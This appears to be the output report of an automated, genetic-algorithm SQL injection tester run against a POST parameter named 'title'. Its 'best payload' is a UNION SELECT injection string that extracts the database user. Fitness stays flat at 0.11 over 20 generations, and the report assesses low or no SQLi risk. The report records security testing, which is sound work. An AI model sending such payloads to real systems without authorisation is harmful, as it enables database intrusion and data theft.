======================================================================
GAXSS SQLi TESTING RESULTS
======================================================================

Timestamp: 2025-12-18 17:47:18
Best Fitness: 0.1100
Generations Analyzed: 20

Tested Parameter: title (method=POST)

BEST PAYLOAD:
----------------------------------------------------------------------
 UNION SELECT 1, user(), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30

FITNESS PROGRESSION:
----------------------------------------------------------------------
Gen   1: 0.1100
Gen   2: 0.1100
Gen   3: 0.1100
Gen   4: 0.1100
Gen   5: 0.1100
Gen   6: 0.1100
Gen   7: 0.1100
Gen   8: 0.1100
Gen   9: 0.1100
Gen  10: 0.1100
Gen  11: 0.1100
Gen  12: 0.1100
Gen  13: 0.1100
Gen  14: 0.1100
Gen  15: 0.1100
Gen  16: 0.1100
Gen  17: 0.1100
Gen  18: 0.1100
Gen  19: 0.1100
Gen  20: 0.1100

ASSESSMENT:
----------------------------------------------------------------------
Status: Low/No SQLi Detected
Risk Level: Low
